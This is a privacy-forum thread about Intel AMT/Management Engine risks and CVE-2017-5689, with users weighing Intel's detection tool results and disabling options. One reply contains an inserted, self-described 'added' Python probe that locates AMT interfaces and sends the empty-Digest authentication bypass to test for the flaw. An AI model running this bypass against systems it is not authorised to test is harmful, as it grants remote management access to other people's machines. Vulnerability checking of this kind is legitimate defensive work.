"Private Internet Access does not log" - what about Intel AMT/Active Management Technology?

Regarding:
https://www.privateinternetaccess.com/forum/discussion/25521/private-internet-access-does-not-log


But what if there's a sub-o/s leak of all your PC's content via Intel Active Management Technology / Intel Management Engine or its equivalents like AMD's Platform Security Processor /PSP? Since ca. 2006 at least...

Some informed comment from PIA in particular on the following would be welcome, to me it's mostly incomprehensible, as incomprehensible as the output of the Intel diagnostic tool issued in relation to the critical security issue referenced below.

https://www.theregister.co.uk/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

https://en.wikipedia.org/wiki/Intel_Active_Management_Technology

"On May 15th, 2017, Intel announced a critical vulnerability in AMT. According to the update "The vulnerability could enable a network attacker to remotely gain access to business PCs or devices that use these technologies".[43] Intel announced partial availability of a firmware update to patch the vulnerability for some of the affected devices."

http://www.intel.com/content/www/us/en/architecture-and-technology/intel-amt-vulnerability-announcement.html?cid=sem43700020664978070&intel_term=intel+amt&gclid=CjwKEAjw6e_IBRDvorfv2Ku79jMSJAAuiv9YxWLVPO0LpmcztbPctTbUFHqfpKONqvJQnI4XEwwJiRoC8d7w_wcB&gclsrc=aw.ds


https://forums.theregister.co.uk/forum/3/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/

Disregarding the not inconsiderable volume of garbage posts, the following raise concerns:

"This stuff can access the network card directly. It doesn't care about local firewalls."

"....."The design choice of putting a secretive, unmodifiable management chip in every computer was terrible, and leaving their customers exposed to these risks without an opt-out is an act of extreme irresponsibility," (EFF)...

http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html "

"If a machine can't boot its OS, you need something running under the operating system, at the chipset firmware level, to recover the box.

Er, isn't this what PXE booting is for?"

"This "management" is sitting within main processor spying everything it does and acts as a middle man to _everything_ main processor is doing. Perfect backdoor you can't even disable.

Renders any encryption you have totally worthless: NSA _must see_ everything you do and Intel is their hand sock in this case, lying whatever they can."

"Macs have their own System Management Controller (SMC) too..."


"AMT is not supposed to be enabled in "consumer" CPUs; if these are the ones used in any given PC, doesn't the problem take care of itself?"

I haven't searched PIA forums for this yet, I'm just recuperating from the fact that this is apparently reality, and that it's not 'shocking' but plausibly predictable.

Comments

  • Posts: 224
    Tripod said:
    [quotes the original post above in full]

    https://www.privateinternetaccess.com/forum/discussion/23900/private-internet-access-is-not-affected-by-the-intel-amt-vulnerability

  • Posts: 266
    @OpenVPN I was about to unsticky that post along with a bunch of other old news. I guess they'll stay there a bit longer eh!
  • Posts: 43
    Thanks for link @OpenVPN.

    That's server side - good! - unless you link from the main article I quoted
    https://www.theregister.co.uk/2017/10/21/purism_cleanses_laptops_of_intel_management_engine/
    to
    https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/

    and also read this:

    "The revelation prompted calls for a way to disable the poorly understood hardware. At the time, the Electronic Frontier Foundation called it a security hazard. The tech advocacy group
    demanded a way to disable "the undocumented master controller inside our Intel chips" and details about how the technology works.

    An unofficial workaround called ME Cleaner can partially hobble the technology, but cannot fully eliminate it. "Intel ME is an irremovable environment with an obscure signed proprietary firmware, with full network and memory access, which poses a serious security threat," the project explains.

    On Monday, Positive Technologies researchers Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy said they had found a way to turn off the Intel ME by setting the undocumented HAP bit to 1 in a configuration file."


    So presumably OpenVPN's link above means PIA has done just this, resetting the undocumented HAP bit....?

    As for client side (me) I guess I will have to waste more time reading Intel's website and / or asking its support to translate the meaning of the following result of running 'INTEL-SA-00075 Detection and Mitigation Tool'

    https://downloadcenter.intel.com/download/26755/INTEL-SA-00075-Detection-and-Mitigation-Tool?v=t

    on a Sony Vaio, thus:

    **********************************************
    Risk Assessment
    Based on the analysis performed by this tool, this system is not vulnerable; the ME SKU is not affected.

    Explanation:
    If Vulnerable, contact your OEM for support and remediation of this system.
    For more information, refer to CVE-2017-5689 in the following link: CVE-2017-5689
    [https://nvd.nist.gov/vuln/detail/CVE-2017-5689]
    or the Intel security advisory Intel-SA-00075 in the following link: INTEL-SA-00075
    [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr]

    INTEL-SA-00075 Detection Tool

    Application Version: 1.0.3.215
    Scan date: 2017-10-24 01:26:43

    Host Computer Information
    Name: Sony...........
    Manufacturer: Sony Corporation
    Model: VP.......
    Processor Name: Intel(R) Core(TM) i5 CPU M 520 @ 2.40GHz
    Windows Version: Microsoft Windows 7 Professional

    ME Information

    Version: 6.0.3.1195
    SKU: Consumer
    Provisioning Mode: Not Provisioned
    Control Mode: None
    Is CCM Disabled: True
    Driver installation found: True
    EHBC Enabled: False
    LMS service state: Running   <------------------------------------------------------------N.B.
    microLMS service state: NotPresent
    Is SPS: False

    *************************************************************************

    For instance there's an interesting Intel Support exchange here:
    https://communities.intel.com/thread/114519

    [Customer] "And how to prevent AMT provisioning?, does AMT provisioning state switch from 0 to 2 automatically or under any specific circumstance?"

    [Intel] "AMT provisioning does not switch state automatically."

    [Customer] "If a machine having LMS service but AMT is unprovisioned, is it vulnerable?"
    {Tripod: see my Intel diagnosis report above}

    [Intel] "The vulnerability on the system will not be fixed until the firmware has been updated."


    {Tripod: so where the diagnosis report above shows LMS service running but the rest (semble) is inactive that means no firmware update is needed..? (and how exactly would that be accomplished on a no-longer-supported Sony Vaio?)}


    In that same thread Intel Support states:
    "Without vPro, there is no AMT and hence, you are not exposed to this vulnerability..."

    My questions in the ignorance of the non-tech user are:

    1) is there another Intel "management" (sic) routine by another name aside from AMT under "vPro"?

    2) Intel has confirmed it is not providing a "backdoor" in its chips so on what is based all that content to the opposite in theregister articles and links? They don't all look just like click-bait.

    I appreciate these are primarily Intel Support questions, I'm just looking for some third party (informed) community indication of consensus of whether there is a material issue or not even after running 'INTEL-SA-00075 Detection and Mitigation Tool' with the result above.
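    Added example (not part of this thread, and not Intel's detection tool): a small Python probe for the network side of the question above, i.e. whether a box on your LAN is actually exposing the AMT web interface and, if it is, whether it still accepts the empty Digest "response" that INTEL-SA-00075 / CVE-2017-5689 patched. The ports are Intel's documented AMT defaults, the host name is a placeholder, and the sample replies in the test are constructed. A machine that reports "Not Provisioned" (as the report above does) has no listener for this to find, so a clean result from this probe says nothing about whether the ME firmware itself has been updated; that is what Intel's "not fixed until the firmware has been updated" answer refers to.

```python
"""Probe a host for an exposed Intel AMT web interface (plaintext port 16992)
and test the CVE-2017-5689 empty-Digest-response bypass against it.

Added example for the thread above; hosts, nonces and replies are placeholders
or constructed test data. Ports are Intel's documented AMT defaults.
"""
import re
import socket
from typing import Optional

# Intel AMT default listeners (assumed defaults; an OEM/admin can move them).
AMT_PORTS = {16992: "AMT HTTP", 16993: "AMT HTTPS",
             16994: "redirection (SOL/IDE-R)", 16995: "redirection TLS",
             623: "RMCP/ASF", 664: "secure RMCP"}

_STATUS_RE = re.compile(r"^HTTP/1\.[01]\s+(\d{3})")
_SERVER_RE = re.compile(
    r"^Server:\s*Intel\(R\) Active Management Technology\s*([\d.]*)", re.I | re.M)
_DIGEST_RE = re.compile(r"^WWW-Authenticate:\s*Digest\s+(.*)$", re.I | re.M)
_PARAM_RE = re.compile(r'(\w+)="?([^",]*)"?')


def parse_response(raw: bytes) -> dict:
    """Extract status, AMT banner/version and any Digest challenge parameters."""
    head = raw.decode("latin-1", errors="replace").replace("\r\n", "\n").split("\n\n", 1)[0]
    m = _STATUS_RE.match(head)
    s = _SERVER_RE.search(head)
    d = _DIGEST_RE.search(head)
    return {
        "status": int(m.group(1)) if m else None,
        "is_amt": s is not None,
        "version": (s.group(1) or None) if s else None,
        "challenge": dict(_PARAM_RE.findall(d.group(1))) if d else {},
    }


def bypass_request(host: str, challenge: dict, uri: str = "/index.htm") -> bytes:
    """Build the published CVE-2017-5689 test: a Digest Authorization header
    whose response field is empty. A patched ME answers 401; an unpatched one
    answers 200, because it only compared as many bytes as the client sent."""
    auth = ('Digest username="admin", realm="%s", nonce="%s", uri="%s", response=""'
            % (challenge.get("realm", ""), challenge.get("nonce", ""), uri))
    return ("GET %s HTTP/1.1\r\nHost: %s\r\nAuthorization: %s\r\n"
            "Connection: close\r\n\r\n" % (uri, host, auth)).encode()


def assess(first: dict, second: Optional[dict]) -> str:
    """Classify a host from the unauthenticated reply and the bypass reply."""
    if not first["is_amt"]:
        return "no-amt-banner"
    if first["status"] != 401 or not first["challenge"]:
        return "amt-no-auth-challenge"
    if second is None:
        return "amt-exposed-untested"
    return "amt-vulnerable-cve-2017-5689" if second["status"] == 200 else "amt-exposed-patched"


def probe(host: str, port: int = 16992, timeout: float = 3.0) -> dict:
    """Live probe: fetch /index.htm, then retry with the empty-response Digest.
    Only run this against hosts you are authorised to test."""
    def exchange(req: bytes) -> bytes:
        chunks = []
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req)
            while True:
                c = s.recv(4096)
                if not c:
                    break
                chunks.append(c)
        return b"".join(chunks)

    first = parse_response(exchange(
        ("GET /index.htm HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n" % host).encode()))
    second = None
    if first["is_amt"] and first["challenge"]:
        second = parse_response(exchange(bypass_request(host, first["challenge"])))
    return {"host": host, "port": port, **first, "verdict": assess(first, second)}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # placeholder address
    print(probe(target))
```

    The two-step shape matters: a 401 with a Digest challenge and an AMT Server header proves only that AMT is provisioned and listening, which is the ordinary state for a vPro business machine; the verdict comes from whether the second request, carrying `response=""`, is still rejected. Run it from another host on the same segment, since the management interface answers on the on-board NIC below the OS and a local firewall on the target will not block it.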


  • Posts: 266
    I don't really have the answer to those specific questions but my understanding from our official announcement is that we just don't use the built-in ports anyway. There's a ton of traffic that flows in and out of the servers so it would make sense that most of our servers use a couple of PCIe network cards which wouldn't be any use to exploit the AMT unless Intel baked drivers for a whole ton of third-party network cards into their CPUs. That wouldn't be impossible strictly speaking, but considering the purpose of the network stack in the firmware is for remote management of servers I doubt they'd have done that unless they were specifically aiming at a reliable backdoor.
  • Posts: 43
    The story runs and runs...

    http://www.tomshardware.com/news/google-removing-minix-management-engine-intel,35876.html

    At least it provides relief from
    http://cryptome.org/2013/12/Full-Disclosure.pdf
    "Full Disclosure: The Internet Dark Age"
    (BT router has vlan back door)
    - relief that is, as in: a bit like the pain of falling off a ladder after you've hit your thumb with a hammer...
  • edited November 13 Posts: 85
    @max-P @Tripod ; Also a good read:

    https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it

    Frankly, whatever vulnerabilities your system has inherently are out of reach of PIA or any software solution really. It is a big problem, but it's not one PIA or even you can solve. It will only be solved when consumers stand up and demand open source hardware.

    The newer chip and computer you buy, the more chance it is probably harboring something like this (or worse) inside it and it is a legitimate concern and reason why many hackers still prefer older model laptops and desktops.

    Personally, I choose to operate with the assumption of total compromise but also a reasonable threat assessment:

    1. Exploiting this vulnerability in the wild would send shockwaves across the entire hardware world and whatever oppressive government shadow groups who might have weaponized it will use it sparingly as they would a nuke, as they will only get one shot at it;
    2. There is a huge difference between intelligence gathering/dragnets and targeted attacks. The amount of resources needed for a targeted attack that something like that would require is like out of a movie where the whole world can only be saved by some hacker.

    Is it a legitimate threat?


    Not for most people I'd say. As time goes by though, the statistical chances of it being used as part of an exploit do grow bigger.

    Is it worth making noise about?


    Of course. Anything that potentially sets our society, security or personal safety back is worth making noise about. Personally, I make noise about mobile phones having blobbed firmware and modems, and how no one can truly trust a phone's software and operating system so long as the phone itself can always read whatever is in RAM and send it off to the carrier. Unacceptable!

    What can I do?


    Personally? Keep an eye out for fixes, patches, watch the discussion, look for future chipsets that don't have binary blobs, look for solutions that can be considered "open hardware", practice good firewall policies so that exploits can't get in or out, don't become an enemy of the state, etc.

    What can we all do?


    Stop supporting closed source solutions, security through obscurity, organizations that pretend it's not an issue, and chips that run their own binary blob operating systems inside. Boycott the industry if necessary. Crowdfund alternatives. Be a part of the change! It's a long road though and the battle is against a well entrenched, government and military supported oligopoly. It will not be easy nor speedy to resolve this. It will take a revolution of sorts that will first most likely require a nationstate or major corporation be crippled by this vulnerable model.

    Important to note though that Google is already fighting against it for their security model for example. Doesn't mean an open source or more transparent solution will be available to the public though, they might just get a special deal in private.